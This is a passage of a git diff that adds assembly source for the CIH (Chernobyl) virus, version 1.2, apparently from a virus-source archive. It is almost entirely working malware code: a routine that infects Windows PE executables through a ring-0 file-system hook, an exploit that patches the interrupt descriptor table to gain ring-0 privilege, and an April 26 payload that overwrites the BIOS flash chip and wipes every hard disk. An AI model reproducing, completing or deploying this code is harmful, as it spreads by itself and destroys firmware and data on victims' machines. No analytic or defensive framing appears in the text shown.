ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + + jc DisableOnBusy + + push ecx + +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] + +; ************************************* +; * Is Read-Only File !? * +; ************************************* + + test cl, 01h + jz OpenFile + +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Open File * +; ************************************* + +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + + xchg ebx, eax ; mov ebx, FileHandle + +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + + pop ecx + + pushf + + test cl, 01h + jz IsOpenFileOK + +; ************************************* +; * Restore Attributes of the File * +; ************************************* + + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Is Open File OK !? * +; ************************************* + +IsOpenFileOK: + popf + + jc DisableOnBusy + +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + + push esi ; Push FileNameBuffer Address to Stack + + pushf ; Now CF = 0, Push Flag to Stack + + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer + +; *************************** +; * Get OffsetToNewHeader * +; *************************** + + xor eax, eax + mov ah, 0d6h + + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + + xor ecx, ecx + mov cl, 04h + xor edx, edx + mov dl, 3ch + call edi ; VXDCall IFSMgr_Ring0_FileIO + + mov edx, [esi] + +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + + dec edx + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Is PE !? * +; *************************** +; * Is the File * +; * Already Infected !? * +; *************************** + + ; cmp [esi], '\0PE\0' + cmp dword ptr [esi], 00455000h + jne CloseFile + +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + + push ebx ; Save File Handle + + push 00h ; Set VirusCodeSectionTableEndMark + +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer + +; *************************** +; * Save ESP Register * +; *************************** + + mov dr1, esp + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + + push eax ; Size + +; *************************** +; * Let's Read * +; * Image Header in File * +; *************************** + + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer + +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] + +; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + + mov al, SizeOfScetionTable + + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + + mul cl + +; *************************** +; * Let's Set Section Table * +; *************************** + + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer + +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + + inc ecx + push ecx ; Save NumberOfSections+1 + + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + + add ecx, eax + add ecx, edx + + sub ecx, (SizeOfHeaders-@9)[esi] + jnc short OnlySetInfectedMark + + not ecx + inc ecx + + cmp cx, small CodeSizeOfMergeVirusCodeSection + jb OnlySetInfectedMark + +; *************************** +; * Save Original * +; * Address of Entry Point * +; *************************** + + ; Save My Virus First Section Code + ; Size of Following Section Table... + ; ( Not Include the Size of Virus Code Section Table ) + push ecx + + xchg ecx, eax ; ECX = Size of Section Table + + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax + +; *************************** +; * Read All Section Tables * +; *************************** + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + + push edi ; Size + + add edx, eax + push edx ; Pointer of File + + add eax, esi + push eax ; Address of Buffer + +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + + lea eax, [eax+edi-04h] + mov [eax], ebx + +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + + push ebx ; Size + + add edx, edi + push edx ; Pointer of File + + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer + +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus Entry Point * +; *************************** + + mov (NewAddressOfEntryPoint-@9)[esi], edx + +; *************************** +; * Setup Initial Data * +; *************************** + + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + + jmp StartToWriteCodeToSections + +; *************************** +; * Write Code to Sections * +; *************************** + +LoopOfWriteCodeToSections: + + add edx, SizeOfScetionTable + + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] + jbe EndOfWriteCodeToSections + + push ebx ; Size + + sub eax, 08h + mov [eax], ebx + + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + + push edi ; Address of Buffer + + mov ebx, (VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. ==> 40000000h + or (Characteristics-@9)[edx], 40000040h + +StartToWriteCodeToSections: + + sub ebp, ebx + jbe SetVirusCodeSectionTableEndMark + + add edi, ebx ; Move Address of Buffer + +EndOfWriteCodeToSections: + + loop LoopOfWriteCodeToSections + +; *************************** +; * Only Set Infected Mark * +; *************************** + +OnlySetInfectedMark: + mov esp, dr1 + + jmp WriteVirusCodeToFile + +; *************************** +; * Set Virus Code * +; * Section Table End Mark * +; *************************** + +SetVirusCodeSectionTableEndMark: + + ; Adjust Size of Virus Section Code to Correct Value + add [eax], ebp + add [esp+08h], ebp + + ; Set End Mark + xor ebx, ebx + mov [eax-04h], ebx + +; *************************** +; * When VirusGame Calls * +; * VxDCall, VMM Modifies * +; * the 'int 20h' and the * +; * 'Service Identifier' * +; * to 'Call [XXXXXXXX]'. * +; *************************** +; * Before Writing My Virus * +; * to File, I Must Restore * +; * them First. ^__^ * +; *************************** + + lea eax, (LastVxDCallAddress-2-@9)[esi] + + mov cl, VxDCallTableSize + +LoopOfRestoreVxDCallID: + mov word ptr [eax], 20cdh + + mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] + mov [eax+2], edx + + movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] + sub eax, edx + + loop LoopOfRestoreVxDCallID + +; *************************** +; * Let's Write * +; * Virus Code to the File * +; *************************** + +WriteVirusCodeToFile: + mov eax, dr1 + mov ebx, [eax+10h] + mov edi, [eax] + +LoopOfWriteVirusCodeToFile: + + pop ecx + jecxz SetFileModificationMark + + mov esi, ecx + mov eax, 0d601h + pop edx + pop ecx + + call edi ; VXDCall IFSMgr_Ring0_FileIO + + jmp LoopOfWriteVirusCodeToFile + +; *************************** +; * Let's Set CF = 1 ==> * +; * Need to Restore File * +; * Modification Time * +; *************************** + +SetFileModificationMark: + pop ebx + pop eax + + stc ; Enable CF(Carry Flag) + pushf + +; ************************************* +; * Close File * +; ************************************* + +CloseFile: + xor eax, eax + mov ah, 0d7h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Need to Restore File Modification * +; * Time !? * +; ************************************* + + popf + pop esi + jnc IsKillComputer + +; ************************************* +; * Restore File Modification Time * +; ************************************* + + mov ebx, edi + + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Disable OnBusy * +; ************************************* + +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy + +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* + +prevhook: + popad + + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook + +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* + +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + + mov [ebx+1ch], eax ; Modify EAX Value in Stack + +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. * +; *************************** + + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook + +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax + +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** + +QuitMyVirusFileSystemHook: + + popad + + ret + +; ************************************* +; * Kill Computer !? ... *^_^* * +; ************************************* + +IsKillComputer: + ; Get Now Month from BIOS CMOS + mov ax, 0708h + out 70h, al + in al, 71h + + xchg ah, al + + ; Get Now Day from BIOS CMOS + out 70h, al + in al, 71h + + xor ax, 0426h ; 04/26/???? + jne DisableOnBusy + +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] + +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi + +; *********************** +; * Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi + +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... * +; *********************** + + lea ebx, EnableEEPROMToWrite-@10[esi] + + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + + push ecx + loop $ + +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + + xor ah, ah + mov [eax], al + + xchg ecx, eax + loop $ + +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... * +; *********************** + + mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + + loop $ + +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + + mov ah, 0e0h + mov [eax], al + +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi + +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * +; *************************************************** + +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + + mov esi, esp + sub esp, 0ach + +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + + cmp word ptr [esi+06h], 0017h + je KillNextDataSection + +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + + jmp LoopOfKillHardDisk + +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + + jmp LoopOfKillHardDisk + +; *************************** +; * Enable EEPROM to Write * +; *************************** + +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + + ret + +; *************************** +; * IO for EEPROM * +; *************************** + +IOForEEPROM: +@10 = IOForEEPROM + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + in al, dx + +BooleanCalculateCode = $ + or al, 44h + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + out dx, al + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath + +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h + +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* + +VirusVersionCopyright db 'CIH v' + db MajorVirusVersion+'0' + db '.' + db MinorVirusVersion+'0' + db ' TTIT' + +; ********************************************************* +; * Virus Size * +; ********************************************************* + +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; * Dynamic Data * +; ********************************************************* + +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? +SizeOfImageHeaderToRead = $-NumberOfSections + +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite = 04h + +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName + +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* + +VirusNeedBaseMemory = $ + +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; ********************************************************* + +VirusGame ENDS + + END FileHeader \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cih_12_2.asm b/MSDOS/Virus.MSDOS.Unknown.cih_12_2.asm new file mode 100644 index 00000000..044ca02d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih_12_2.asm @@ -0,0 +1,1480 @@ +; **************************************************************************** +; * The Virus Program Information * +; **************************************************************************** +; * * +; * Designer : CIH Original Place : TTIT of Taiwan * +; * Create Date : 04/26/1998 Now Version : 1.2 * +; * Modification Time : 05/21/1998 * +; * * +; *==========================================================================* +; * Modification History * +; *==========================================================================* +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; *==========================================================================* +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. Use Better Algorithm, Reduce Virus Code Size. * +; * 4. The Virus "Basic" Size is only 796 Bytes. * +; *==========================================================================* +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; **************************************************************************** + + .586P + +; **************************************************************************** +; * Original PE Executable File(Don't Modify this Section) * +; **************************************************************************** + +OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 00000000h, VirusSize + +OriginalAppEXE ENDS + +; **************************************************************************** +; * My Virus Game * +; **************************************************************************** + +; ********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 + +DEBUG = TRUE + +MajorVirusVersion = 1 +MinorVirusVersion = 2 + +VirusVersion = MajorVirusVersion*10h+MinorVirusVersion + + +IF DEBUG + + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 05h + +ELSE + + FirstKillHardDiskNumber = 80h + HookExceptionNumber = 03h + +ENDIF + + +FileNameBufferSize = 7fh + +; ********************************************************* +; ********************************************************* + +VirusGame SEGMENT + + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame + +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* + +MyVirusStart: + push ebp + +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. * +; ************************************* + + lea eax, [esp-04h*2] + + xor ebx, ebx + xchg eax, fs:[ebx] + + call @0 +@0: + pop ebx + + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + + push eax + +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... * +; ************************************* + + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + + cli + + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + + lea esi, MyExceptionHook-@1[ecx] + + push esi + + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + + pop esi + +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ + +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + + push esi + mov esi, eax + +LoopOfMergeAllVirusCodeSection: + + mov ecx, [eax-04h] + + rep movsb + + sub eax, 08h + + mov esi, [eax] + + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + + jmp LoopOfMergeAllVirusCodeSection + +QuitLoopOfMergeAllVirusCodeSection: + + pop esi + +; ************************************* +; * Generate Exception Again * +; ************************************* + + int HookExceptionNumber ; GenerateException Again + +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* + +ReadyRestoreSE: + sti + + xor ebx, ebx + + jmp RestoreSE + +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. * +; ************************************* + +StopToRunVirusCode: +@1 = StopToRunVirusCode + + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] + +RestoreSE: + pop dword ptr fs:[ebx] + pop eax + +; ************************************* +; * Return Original App to Execute * +; ************************************* + + pop ebp + + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + + ret ; Return to Original App Entry Point + +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* + +MyExceptionHook: +@2 = MyExceptionHook + + jz InstallMyFileSystemApiHook + +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException + +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* + +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + + iretd + +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* + +AllocateSystemMemoryPage: + + mov dr0, ebx ; Set the Mark of My Virus Exist in System + + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + + xchg edi, eax ; EDI = SystemMemory Start Address + + lea eax, MyVirusStart-@2[esi] + + iretd ; Return to Ring3 Initial Program + +; ************************************* +; * Install My File System Api Hook * +; ************************************* + +InstallMyFileSystemApiHook: + + lea eax, FileSystemApiHook-@6[edi] + + push eax ; + int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook +IFSMgr_InstallFileSystemApiHook = $ ; + dd 00400067h ; Use EAX, ECX, 